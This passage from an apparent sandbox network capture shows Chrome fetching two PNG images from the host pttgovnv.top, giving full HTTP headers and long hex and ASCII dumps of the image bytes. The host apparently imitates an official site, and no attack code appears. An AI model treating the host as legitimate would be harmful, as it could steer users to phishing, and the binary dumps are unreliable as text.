c0 80 fe 5b d3 52 53 57 8e 6e 41 14 d2 f3 4a 97 1b 36 6e 7a 47 a3 d1 cc
          Data Ascii: -k4!!,r{9y|Z4CTU`:vYa{l0f|FZkg/y2\JAX"[Bu*qM,._Xj|>aBUer,*^]^^2=;/T'z`/bg[RSWnAJ6nzG
          2024-09-01 22:25:29 UTC1369INData Raw: 4c 2c da 3e fc e2 05 d1 e3 ee f0 f1 35 94 70 d2 67 93 b1 a2 37 9d 9f 23 39 d5 51 59 d7 6a 1e 25 dd a1 e2 14 37 98 68 d6 93 a4 48 53 06 ae 96 ce e5 f4 99 53 0f d3 65 7e 41 c1 cb 54 d0 50 c2 23 c2 fd 2e 47 ea 7e bc 78 f1 f2 b7 d8 f7 a1 e1 79 e3 27 34 3f d1 a1 a6 ae 36 a1 ce 6a 63 ee 58 2a 34 fb f5 eb cb be 1f 3d 7a f4 9b 0b ef 5e d0 38 1b 89 3f 6d 9a 3a 36 6c 4a c0 38 ae 9f fd f4 e9 e7 1b 6f ff 8b 2f bf 62 63 5e 77 ee da 3d df ed 92 af c1 3e 7d fa bc 3f 61 7c 1a 7b 21 8a 8a 8a cc 1e 3b 76 4c b3 c2 76 d6 ac 19 d9 11 91 e1 4c 9c 65 65 9d 72 56 d7 d4 b2 2c 2b d5 55 d5 4c b0 0e 1e 32 98 d5 a7 c5 f1 5f d2 fd c4 e7 95 ef 35 3a 49 c0 25 24 c4 91 31 63 c6 b2 cf c3 87 8f f0 bf 90 66 1d 3f 4e b6 7e bd 5d 16 7e 3a 2d b1 da 6c 4b 8e 1c 3d c6 ea 14 13 15 75 36 b0 ed a4
          Data Ascii: L,>5pg7#9QYj%7hHSSe~ATP#.G~xy'4?6jcX*4=z^8?m:6lJ8o/bc^w=>}?a|{!;vLvLeerV,+UL2_5:I%$1cf?N~]~:-lK=u6


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          108192.168.2.449855104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC361OUTGET /help/layout/images/53.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC731INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: image/png
          Content-Length: 68155
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"10a3b-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36238
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y8lCt7a3ceZfjQ8qyqJ6a6dhGXYN%2BlxcqmYvIiULrsKb%2FB%2Fb5ulG%2FwqggOMxARqouHsO9SLF2WpQOY3bu%2Buv9wt6OVyNSQFNS%2BKKSxR1UNoZ4MliWkoyDjsF8DzpkDQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2c6f80438c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC638INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 01 09 c8 49 44 41 54 78 da ec 9d 07 80 14 e5 d9 c7 9f 77 66 eb f5 e3 38 38 40 8a 14 1b 16 9a 15 63 c5 8a d8 7b fd 6c 88 dd a8 51 a3 18 4d 62 4c 34 cd 98 68 2c 31 2a 2a b6 28 16 ec 1a 13 2b 2a 08 08 0a 48 87 a3 1c 70 c7 f5 db db 9d 79 df ef ad 33 ef ec 1d 2a 24 c4 c2 f3 4b d6 6d b3 b3 b3 b3 b3 37 7f fe 4f 23 8c 31 40 10 04 41 10 04 41 be 5f 38 b8 0b 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<IDATxwf88@c{lQMbL4h,1**(+*Hpy3*$Km7O#1@AA_8AAP! (AAq (AAq
          2024-09-01 22:25:29 UTC1369INData Raw: 08 8a 38 04 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 50 c4 21 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 28 e2 10 04 41 10 04 41 10 14 71 08 82 20 08 82 20 08 8a 38 04 41 10 04 41 10 14 71 08 82 20 08 82 20 08 8a 38 04 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 8a 38 04 41 10 04 41 10 04 45 1c 82 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 22 0e 41 10 04 41 10 04 41 11 87 20 08 82 20 08 82 a0 88 43 10 04 41 10 04 41 11 87 20
          Data Ascii: 8AAE "AAE "AAA "AAA CAA CAAP! (AAP! (AAq (AAq 8AAq 8AAE 8AAE "AAA "AAA CAA
          2024-09-01 22:25:29 UTC1369INData Raw: c4 21 ff 1b 44 3b 90 fb 1e 7a 28 96 cb 64 72 97 5c 7c d1 6e 7f b9 eb ee 71 fc e1 33 41 15 21 98 2f b8 73 95 63 0b 20 cf 03 6f f9 12 a0 cb 97 82 ff c5 4c a0 d5 cb f9 73 8e 72 c5 84 e0 12 05 a9 d2 59 63 52 90 c9 8b cf 02 b1 c6 f4 6d 21 e8 08 b3 96 93 7a cd e7 8f 11 b5 1e aa 85 1d b5 5f 4b e5 eb 89 f5 1a e0 e2 4e 3c 2e c5 1f 17 95 2c e3 81 5b 56 04 ce f6 db 43 7c d7 61 10 1b b2 33 c4 fa f6 06 88 e9 76 87 62 59 f7 6b 43 bb f6 01 2f 3f 78 a6 bd fd 1f 63 cf 3b ff a6 09 8f 4c f8 62 dc d8 b1 ce 83 13 1e 21 ed 99 36 0c b9 22 08 82 20 28 e2 90 cd cb 3d 77 df 55 76 ca 69 a7 ef 53 bd 6c f9 31 db 0f 1e 7c 34 71 48 09 89 0a b7 4e 05 1c cb b4 01 ad 59 01 74 cd 6a 2e d8 96 f2 eb 1a a0 eb 1b b8 18 6a 87 20 ca 4a b5 63 26 b4 8f 10 5a 52 60 09 07 0d 02 77 0d e4 43 3a 6c 6a
          Data Ascii: !D;z(dr\|nq3A!/sc oLsrYcRm!z_KN<.,[VC|a3vbYkC/?xc;Lb!6" (=wUviSl1|4qHNYtj.j Jc&ZR`wC:lj
          2024-09-01 22:25:29 UTC1369INData Raw: 60 12 97 df 77 1d 19 fa 34 79 6a 6a 64 3d d3 07 12 48 c7 4f e4 a4 39 42 24 89 6b be bc 13 77 b9 c8 8b 83 cb 85 1d 49 ba 10 4b 15 80 9b 4c 82 13 8b f1 e7 63 20 66 a1 06 05 0d c6 91 33 21 5a c2 c2 8a 54 ed c2 59 fd de 20 28 a8 08 ee d2 a0 90 35 14 6b 61 e8 95 01 0d 57 69 96 30 f9 77 a2 70 83 6f 6f 7c f8 20 48 ec b1 37 24 76 dd 03 dc de bd 37 d4 83 ce fe d1 34 3d fd c4 e3 0f bd f6 fa 1b bf 4f 26 12 d5 a2 09 9d f8 fe f0 48 46 10 04 41 50 c4 6d 61 7c f4 e1 94 ad 46 ec b6 eb 9f b9 b8 39 da 71 88 90 56 2e 74 52 69 ca 9a 9b 20 f7 c1 5b e0 2f 5d 00 24 9e 0a dc 2d e1 9e 39 5c 70 41 2c 0e 99 05 4b a0 75 de 12 c8 56 af 81 4c cd 3a 19 86 74 45 e2 3f 17 2b 52 cc 88 c4 7f bd f2 78 2a 01 f1 a2 22 88 95 17 83 93 4e 42 2c 99 00 97 5f 9b bc 36 e2 f0 d7 70 31 26 04 21 cb aa
          Data Ascii: `w4yjjd=HO9B$kwIKLc f3!ZTY (5kaWi0wpoo| H7$v74=O&HFAPma|F9qV.tRi [/]$-9\pA,KuVL:tE?+Rx*"NB,_6p1&!
          2024-09-01 22:25:29 UTC1369INData Raw: e6 9a 6b 9e e5 7b be 17 d9 c0 7c d3 dc b4 f7 80 2e 98 03 90 4c 88 09 ed d0 3a 77 21 d4 3e fb 26 78 4d 2d 32 7f 4d b4 c8 88 97 16 41 e9 de 23 a0 70 fb ad 01 12 71 35 fd 40 ba 6e e1 ec d1 b0 37 9c 72 df 82 50 6a 87 99 a6 f6 d8 2b e3 a6 d9 e1 51 5b c4 85 0e 5d 30 81 c1 a7 96 e3 45 a3 02 8f 9a b1 5d 34 6c 00 4c 20 22 e0 b4 52 d2 1a 2f ac 4a 65 54 84 54 95 9a f2 3d 9d 9f c7 74 8b 13 97 e8 e9 13 8e 16 72 7a 1d 56 45 2b d3 db a4 aa 53 7d 59 d0 40 a8 25 1c d5 bb 68 4d 29 fa c9 39 e1 84 0a 62 be 16 d3 af 0e b4 c3 a7 9d ba 76 21 e6 ba 42 c9 4d 37 40 72 f8 b0 af aa 64 e5 5f 8b b7 e6 97 bf fc c5 e9 b7 df fe db 7f 09 39 28 26 6f e0 2f 02 41 10 04 41 11 f7 3d 60 dc d8 b1 64 eb 7e fd 92 a3 46 8d ba 61 f8 6e bb 5d 0b 61 b3 de c8 59 df 5f 36 1f fc 39 9f 01 6b 69 02 bf b6
          Data Ascii: k{|.L:w!>&xM-2MA#pq5@n7rPj+Q[]0E]4lL "R/JeTT=trzVE+S}Y@%hM)9bv!BM7@rd_9(&o/AA=`d~Fan]aY_69ki
          2024-09-01 22:25:29 UTC1369INData Raw: a7 3f 93 14 78 96 48 15 fb 9c 0b c9 c2 d3 c6 40 e1 99 63 81 c4 e3 9d ba 72 be ef 37 ff e4 ea ab ae b9 ff 81 07 27 9c 7e f2 c9 d9 bf de 77 2f ba 72 08 82 20 08 8a b8 ff 35 a6 02 b5 b9 b9 f9 dd c2 c2 c2 3d 88 48 d4 ca 6b 1d e2 cd 9a 0a b4 7a 11 ac fa cb 83 d0 3a 67 89 9c 31 2a 9c b2 92 11 db 43 d7 e3 47 07 62 29 2c 50 60 ca 89 d3 af 67 26 2c 6a 35 df 65 46 4c 19 67 4c e6 ac a9 c9 08 94 fa ca 51 f3 f3 ab 4b fd 50 04 e9 f7 62 3a fc 1a 0a 41 88 84 68 99 16 6a 84 86 c2 ce 6e fc ab 1c 38 50 8d db 4c d1 04 b0 bc 34 b2 fc 9c b2 e8 68 2d d1 7b ce 21 e6 39 35 ac 9e 10 3d 36 cb ea f7 26 fa d2 31 3d 6a 8b 11 23 16 89 ce 6f 53 71 58 ea 51 35 f3 55 7c 2e d1 00 b9 7b 17 88 55 96 aa e5 e2 ae fc 2c 7e 4d 1d 78 ab eb 74 b4 d7 8a 74 eb f9 b3 2a 1f ce 84 5e 75 c8 17 4c 3e a1
          Data Ascii: ?xH@cr7'~w/r 5=Hkz:g1*CGb),P`g&,j5eFLgLQKPb:Ahjn8PL4h-{!95=6&1=j#oSqXQ5U|.{U,~Mxtt*^uL>
          2024-09-01 22:25:29 UTC1369INData Raw: b0 29 6e 30 54 5e 89 13 99 a0 2f 15 84 1f e6 b1 31 1a 6d c8 6b 8a 10 74 ff 37 26 0b 1a a2 c5 0b cc 7a 6d 30 db d4 14 26 74 d6 56 24 78 9d 76 d0 3c bb 0f 5d 28 fc 82 82 06 9a 17 fe f5 c3 ea cd ce a7 33 40 10 9a 65 4c 8d d8 62 c6 49 04 6a e5 c2 a9 62 86 60 ea 82 1f 1a 57 14 2c b7 52 bc 42 4f 10 0b 24 17 35 5a 8e aa 66 c1 41 58 94 bf 83 27 22 ae 54 e5 c5 31 55 75 eb f6 e9 06 a9 c1 03 00 12 09 70 e2 09 f0 6a eb 20 f3 de 67 3a ac ca f8 ee a7 f2 8b 0e 3c 3a 3f 2f 6f cf 44 a1 1d b5 8d 32 77 2e a8 cc d5 22 90 a9 d9 ac cc cb 41 c5 5d bf 83 d4 5e 23 3b 1b d9 25 63 b0 d7 5e 7d d5 55 7f fc cb dd 77 65 33 6d ed f8 ab 43 10 04 41 0c 18 4e dd 44 44 08 f5 67 37 df 7c cc c0 81 83 5e d0 02 2e b2 2f 73 b3 a7 c1 aa f1 e3 a1 e5 b3 39 32 2c 97 da a1 17 f4 bc fc 74 88 77 29 d3
          Data Ascii: )n0T^/1mkt7&zm0&tV$xv<](3@eLbIjb`W,RBO$5ZfAX'"T1Uupj g:<:?/oD2w."A]^#;%c^}Uwe3mCANDDg7|^./s92,tw)
          2024-09-01 22:25:29 UTC1369INData Raw: 4d 12 5d d0 40 3a c9 85 23 61 28 54 0f a2 07 33 32 cb 12 bf 2c df 15 34 35 06 72 c4 58 28 f0 42 ed ac 3f 23 e8 fe 6e da 2d f3 e6 55 43 f3 2b ef 40 6e 6d 9d f0 c6 a4 90 2b 3e ee 10 20 c5 69 b0 12 0b c3 0a 5b 66 39 af f2 7d 75 cf bc 40 f0 99 7c 43 d0 42 4f 59 85 ed ff 9a 01 75 37 ff ac 33 11 27 c4 70 72 fc cd 37 5f 72 e5 e5 97 5d ff c0 84 87 53 f8 cb 44 10 04 41 11 87 7c 0d ab aa 57 54 fc f5 9e 7b 7e eb ba 6e 54 c0 71 71 d2 f0 c4 df a0 fa a2 2b 65 ae 56 c1 b0 ad a1 e7 cd 97 82 5b d1 45 8f 7e a2 79 85 02 10 09 a9 ca de 6b 41 3e 9a 25 ba 00 c2 90 a9 39 c9 1b 07 8e b1 4e 1c b8 70 fc 96 12 1e 56 ee 1a 98 80 62 5e b8 d4 14 2d 00 eb d8 93 ce 38 56 ba 05 47 10 72 34 db 60 da 90 04 9f 8d 58 7b 45 87 10 2d 37 2d 74 e2 f2 2a 30 3b a4 64 46 5d 38 62 e5 a8 91 68 88 51
          Data Ascii: M]@:#a(T32,45rX(B?#n-UC+@nm+> i[f9}u@|CBOYu73'pr7_r]SDA|WT{~nTqq+eV[E~ykA>%9NpVb^-8VGr4`X{E-7-t*0;dF]8bhQ
          2024-09-01 22:25:29 UTC1369INData Raw: 46 b0 f2 ab d8 d6 dd a1 70 d4 01 e0 54 54 c8 82 95 96 d7 de 80 ec 8c 85 fc 09 47 85 69 21 0c c9 b2 60 76 98 be f6 1d 6b 6e 2c 84 33 70 c5 4d a2 8e 85 c4 2e 03 a0 cb cd b7 40 7c c0 a0 fc c3 95 7e 32 65 ca 17 e7 5d 78 e1 79 73 e6 cc 99 95 cd 64 5a f1 17 8c 20 08 82 22 6e 8b 64 d4 a8 51 c5 2f bc 38 79 62 41 3a 35 1a f2 87 d9 f3 fd b5 7a 5d 3d 8c 39 e3 52 98 57 5d 13 69 e7 25 4e fc 2e 7f e0 e7 6d 75 70 28 64 64 8b b0 e2 dd 87 40 e5 c9 a3 e5 78 25 29 68 bc 30 2f 2e d2 dc 57 de 56 39 71 d4 38 63 11 97 0d 82 e7 43 37 4d 35 e2 25 e0 f1 97 53 70 84 c8 10 73 a4 4c 63 5f 4f b8 80 be 14 0d 4a d4 81 25 f8 8c 03 07 d1 75 6a a1 26 85 52 30 27 35 14 93 ca 89 83 60 fc 97 1a d3 05 81 2b 65 55 14 58 2e 1c 84 4e 1d 21 c1 e7 21 24 6c ae 4b a9 ed d8 51 99 3f 26 04 8f 94 62 7e
          Data Ascii: FpTTGi!`vkn,3pM.@|~2e]xysdZ "ndQ/8ybA:5z]=9RW]i%N.mup(dd@x%)h0/.WV9q8cC7M5%SpsLc_OJ%uj&R0'5`+eUX.N!!$lKQ?&b~
          2024-09-01 22:25:29 UTC1369INData Raw: 37 cd 1e 58 cf f2 45 a1 90 00 f6 bc 56 eb 75 be 11 97 76 55 2a 8b b8 6b 1d 5d 38 d8 40 41 03 04 02 ce 38 71 4c 57 84 46 43 a9 76 41 83 d1 28 ca b7 33 fa 31 58 af 35 27 36 1c 74 6f e6 af 86 15 a9 aa 0a d4 12 99 41 b1 83 76 bd 74 7f 37 aa c3 d5 c4 77 f5 b0 7a e3 c2 e9 ed 10 4e 5d ce 01 e2 5a 6d 64 b4 a0 a5 ae 12 8e 42 78 16 1e b0 3b 94 9c 73 3e 40 7d 03 b4 be fb 36 b4 3c fb 66 50 c0 12 1a 70 3a 84 ad dd 43 e1 12 4a d1 e8 3b 32 7c 6c 1a 14 ab dc 3c 7d 7c 95 24 a1 fc fa eb a0 f0 f0 88 db 26 57 57 b3 6a 55 cd de fb ee 7b cc d2 65 cb 66 e5 b0 d0 01 41 10 e4 07 09 e6 c4 59 5c 76 c5 8f 4f e5 27 f6 be da 81 93 92 e4 83 a9 b3 e0 de 49 af 40 3c 95 d8 e8 f5 99 20 e1 bf b9 08 38 26 d5 1d 56 91 18 e4 56 36 c1 ca 7b 9e 86 cc c2 45 56 55 24 b5 7a c9 41 28 42 20 14 3a 60
          Data Ascii: 7XEVuvU*k]8@A8qLWFCvA(31X5'6toAvt7wzN]ZmdBx;s>@}6<fPp:CJ;2|l<}|$&WWjU{efAY\vO'I@< 8&VV6{EVU$zA(B :`


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          109192.168.2.449854104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:28 UTC361OUTGET /help/layout/images/52.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:29 UTC726INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:29 GMT
          Content-Type: image/png
          Content-Length: 21895
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"5587-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36238
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O00MNbXNwGDJjAHX5%2Bl5MzEoLP7hZNCr1%2BGi%2F0lGhY8SQW3864t5iDNlu1snclZXpcWyfom7TGJ%2FTut67XUGXF0sqpwfzJntII13nVSq1fSff2ZQkLzR5UHsuCUBF8E%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad2c7cea19bf-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:29 UTC643INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 55 14 49 44 41 54 78 da ec bd 4f 8f 23 49 17 af 15 33 8c 90 90 90 aa 5e 84 e6 22 dd 45 e5 88 0d 42 88 f2 a0 17 b1 01 55 f6 f2 02 9a 72 4b 17 84 10 52 65 6f d8 a1 76 8b 2d a2 5c 9f a0 dd ba 1f a0 b3 24 16 77 37 ee 61 81 58 b5 6b 07 d2 48 e3 e2 0b 8c 6b c1 82 77 33 2e 56 2c 40 8d 4f f5 89 f6 a9 a8 c8 7f 76 da 4e db cf 23 a5 aa db 7f d2 99 91 11 27 7e 71 e2 c4 89 ef be 7c f9 e2 00 00 00 00 60 bf f8 9e 22 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<UIDATxO#I3^"EBUrKReov-\$w7aXkHkw3.V,@OvN#'~q|`"@"q8
          2024-09-01 22:25:29 UTC1369INData Raw: 10 71 00 00 00 00 80 88 03 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 88 38 00 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 11 07 00 00 00 00 88 38 00 00 00 00 40 c4 01 00 00 00 20 e2 00 00 00 00 00 11 07 00 00 00 00 88 38 00 00 00 00 44 1c 00 00 00 00 20 e2 00 00 00 00 00 11 07 00 00 00 00 88 38 00 00 00 00 44 1c 00 00 00 00 20 e2 00 00 00 00 00 11 07 00 00 00 80 88 03 00 00 00 00 44 1c 00 00 00 00 20 e2 00 00 00 00 10 71 00 00 00 00 80 88 03 00 00 00 00 44 1c 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 80 88 03 00 00 00 00 44 1c 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00 80 88 03 00 00 00 40 c4 01 00 00 00 00 22 0e 00 00 00 00 10 71 00 00 00 00
          Data Ascii: q@"q8@"q8@"8@ 8D 8D D qD"qD"q@"q
          2024-09-01 22:25:29 UTC1369INData Raw: cb 97 7d 13 71 22 7e ec ee 0b af 24 ad 85 7a d9 fe d2 d7 6e ad 88 52 51 23 2b 53 4f 5b be 96 54 05 87 08 2e 49 5f 72 66 fe 4a 1c 5e 6a 84 de 44 3f 3b d3 7f 8f 54 68 c5 84 d9 a9 0a be 81 0a 85 91 36 ba 34 10 86 5e c0 85 f7 db f3 82 72 f1 5a 7f 47 cf 49 ae 5d 62 ff de 78 a1 aa f7 35 d2 f2 ba f1 22 53 f6 5a 75 cf 57 13 ff 64 bc ab 5d a8 73 5e a8 57 6d 43 f3 b8 ae 78 56 0f 66 58 4f 7d 7c 64 28 6e ff cf c5 f1 4f e5 59 9b 32 f6 d7 9a 97 e5 43 d4 f4 35 45 62 79 aa 1e e1 75 ca cc 9e 3f 7a be 8a 6b a8 cb c4 b7 a9 26 75 c6 94 d3 36 ee df 79 5b 00 d0 05 7e fc ed f7 d0 e6 46 f9 c7 2f 7f ff 8e d2 ea 36 3f ec e1 35 3f 33 fa 9a 97 cc b9 a5 17 ee 83 35 c0 2a e0 ae 5c 3c e5 c5 2a c6 d9 c6 aa 8d b4 c3 7d d4 ce 64 a8 7f 45 c8 25 da 51 cc 54 50 49 e7 2e b9 d1 a4 33 1e ea 36
          Data Ascii: }q"~$znRQ#+SO[T.I_rfJ^jD?;Th64^rZGI]bx5"SZuWd]s^WmCxVfXO}|d(nOY2C5Ebyu?zk&u6y[~F/6?5?35*\<*}dE%QTPI.36
          2024-09-01 22:25:29 UTC1369INData Raw: de 40 85 e4 c8 75 68 cb 31 33 b5 9c 9b 67 f6 b4 00 40 c4 ea e2 bd 4f 2e 9e 62 c3 8a 9d e1 16 2e d5 8a c5 a6 53 f1 31 c3 77 51 52 c7 12 d7 6c 41 c3 34 b8 b6 bb e0 37 63 af 1d 3c ea 05 bd 2f f1 32 64 ae e5 44 df 00 7b 48 13 8f 34 22 0e 11 b7 b6 88 2b e2 51 13 fc 8e 5d 7c 0a 35 5f 43 b8 79 31 24 95 fd 2a e8 d8 1f 4d 23 c8 b5 92 8b 08 19 69 3a 93 a9 8a a6 cc 08 8e b1 9e d7 0b ac 44 5f bb 75 cb fc 75 a7 fa bd 95 3d 2f da e1 8f f4 5a fc 6f 5f ca bf ab ca c3 df f3 36 a6 5e 8d 90 1b 1b f1 72 ae 1e cb 71 47 44 9c bd de a6 1d ff ac a5 7a 3e 2a b8 9e 81 2d cb 70 64 1d 7b ed 88 98 96 88 38 a6 53 01 9a d9 86 29 c5 d5 7d 3a 39 9d 1a c4 08 25 31 2f 85 ae 42 b5 1d be 08 ac d7 2d 4c a1 8a 48 78 af 46 df 07 e4 3f 68 e7 70 62 84 56 aa 1d f0 2b 23 ce e4 b7 df 6a e5 4f f5 3b
          Data Ascii: @uh13g@O.b.S1wQRlA47c</2dD{H4"+Q]|5_Cy1$*M#i:D_uu=/Zo_6^rqGDz>*-pd{8S)}:9%1/B-LHxF?hpbV+#jO;
          2024-09-01 22:25:29 UTC1369INData Raw: 76 d6 d0 31 b1 ca fb 27 0e 8f 37 22 ae a6 f1 1e ba 97 9b a5 0f 76 35 da 56 91 99 b9 8a e0 7f ed f0 47 e6 73 72 1f d9 0a bb 02 b4 2d a6 52 4d f9 91 fa 11 9b f1 d4 3d ed 52 d1 b6 c8 d4 67 35 8c 18 81 49 51 62 62 23 d6 bb 44 ee e2 53 a3 4f cf 37 52 27 07 25 82 ef 67 8d a3 1c 6a 9c 62 d1 8a dd eb 6d 27 3d ee da a0 ce ac fc 7e 5b f2 d1 0f 6d 6c bf 07 b0 e7 a4 0d 3f 5f ea 89 fb c7 2f 7f 2f 7b ff 92 15 ab 88 b8 49 85 01 17 4f d6 75 e8 bd d8 64 ae b5 00 19 d5 84 1d b3 88 91 51 8d e9 50 e9 50 a6 7a ad f2 9d c9 8e 05 9c 17 53 7e f1 82 17 6f 0f a6 f1 e7 9b 12 c7 ea b5 fc d4 70 34 37 eb 4a 45 8d ec 1a 62 b9 0f bd b2 25 0b 1a 9e ca 3a 9c 86 37 42 3a 46 df 1d 36 32 95 3f 09 8e b9 ae fc fe ac e2 ad 48 3c cb 22 a1 57 6b e6 8b 04 38 14 9a d8 8a c7 0a 91 66 db 58 d9 c0 16
          Data Ascii: v1'7"v5VGsr-RM=Rg5IQbb#DSO7R'%gjbm'=~[ml?_//{IOudQPPzS~op47JEb%:7B:F62?H<"Wk8fX
          2024-09-01 22:25:29 UTC1369INData Raw: 49 4a 3c 04 ab 82 b8 db 0c 9d 8b 37 8c cc 56 d4 0a 23 d0 74 35 e1 54 ab 0d 05 c8 6b d8 83 6f e5 52 30 68 92 7a 68 b7 cb 3b 69 38 b8 1d 05 b6 7d 5a e3 be 26 2b 86 98 b4 39 cb 70 52 e5 75 8a 88 d1 a4 64 10 5b f4 9d 36 44 66 1d 26 2d 57 db 13 76 71 38 1e 11 f7 b4 39 6f 90 1f 2c f4 ba d8 ce d2 76 f4 99 5b 63 05 a5 18 25 2f 22 54 0c ca b9 7e 56 11 f9 a0 ff bf 56 63 27 c6 4f 44 e3 44 ff ff 10 4e 69 a9 a8 cc 55 fc f9 55 9f 89 11 6e 67 e6 3e 7d 42 dd 6b 1d 7d 7e 57 60 98 52 b7 bd 29 ce b1 5b 4e 55 c8 7d de eb 88 3f 51 a3 35 90 ad a1 d4 98 ff a5 c6 4b 3e 27 d3 c4 3d 4d eb 30 6c 60 40 a6 56 18 a9 28 f6 02 fe cc 18 f8 bb 60 d4 9a 9a 01 c0 b6 88 ad 12 b5 a3 e7 ad 8a aa 35 7f 6f 5a 31 a8 6a 63 60 06 cd 3d 1c 65 5e 8d 93 a0 9d ac 7a 1e 5b 87 a6 35 ea d8 63 60 6f 5d 81
          Data Ascii: IJ<7V#t5TkoR0hzh;i8}Z&+9pRud[6Df&-Wvq89o,v[c%/"T~VVc'ODDNiUUng>}Bk}~W`R)[NU}?Q5K>'=M0l`@V(`5oZ1jc`=e^z[5c`o]
          2024-09-01 22:25:29 UTC1369INData Raw: ff cc bd 5c 49 3f 6b a9 4d b6 21 74 26 a6 0e d6 8d 6b 6a 3c 35 2c 03 3c 1d 00 7b 9b 77 59 70 dd d3 48 7b 68 53 50 e6 6a b7 ce 56 ad d3 0d 7e 6b 62 56 f5 5f 05 83 9a 71 c5 35 fa 18 6b db 47 ac b4 b5 de 0a a9 45 10 71 7b 4c 57 3c 71 d6 c8 9d 05 ae 64 a9 dc 0f 5e 34 45 e2 93 6a 0b 06 35 2a 3e 48 5f 1a f6 1f 6e e9 ee 4f f5 48 54 84 4c 54 78 3d ba 65 06 6f 9f e7 2d 37 8b 19 7c 8a 90 d4 78 a8 24 96 ee d4 4c 9b fa 3d f5 64 74 7a a3 a2 e5 c1 88 36 89 ab 90 29 d8 9f d4 c3 37 52 51 79 a3 23 b9 f1 3a d3 11 1a a7 96 e9 b5 ce 4c 2e b7 ac 62 b4 3e d4 eb 97 7b 16 01 22 d3 bd 7f aa e8 cd f5 9e ee 34 f6 c4 c7 04 be 5e b3 83 ba 0c bc 9f e3 c0 93 b3 35 af 64 90 97 2b 64 95 dd 42 ea 24 b1 8e 89 02 cb 43 5b 3b 19 a8 b8 b8 2d 13 8f 4d ea 9e 5e eb fb 0a af 54 67 50 71 56 d6 49
